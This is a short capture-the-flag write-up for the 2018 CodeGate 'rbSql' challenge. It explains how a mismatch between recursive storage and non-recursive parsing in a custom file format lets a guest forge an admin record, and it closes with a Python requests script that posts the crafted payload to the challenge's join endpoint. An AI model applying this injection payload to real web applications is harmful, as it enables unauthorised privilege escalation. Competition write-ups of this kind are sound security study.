This chanllage is open source, main file is [index.php](https://github.com/LyleMi/CTF/blob/master/2018/CodeGate/rbSql/index.php) and [dbconn.php](https://github.com/LyleMi/CTF/blob/master/2018/CodeGate/rbSql/dbconn.php) .

In this site, we can join / login / get our info. It store data in a specially constructed file. The first byte of file is ``\x01`` or ``\x02``, which means store a string or an array, The second byte store the length of string or array.

When we login as admin, we can get flag, but it seems we can only join as guest. After source code audit, I notice that this site use recursive in store, but not parse recursively. So if we construct a complicated array, parser will miss parse it, then we can generate any value we want. The final exploit is

```python
import requests
data = {
"uid": "lyle",
"umail[]": "\x20a87ff679a2f3e71d9181a67b7542122c\x01\x0d192.168.186.1\x01\x012",
"upw": "1"
}
requests.post("http://52.78.188.150/rbsql_4f6b17dc3d565ce63ef3c4ff9eef93ad/?page=join_chk", data)
```

Original writeup (https://github.com/LyleMi/CTF/blob/master/2018/CodeGate/rbSql/index.md).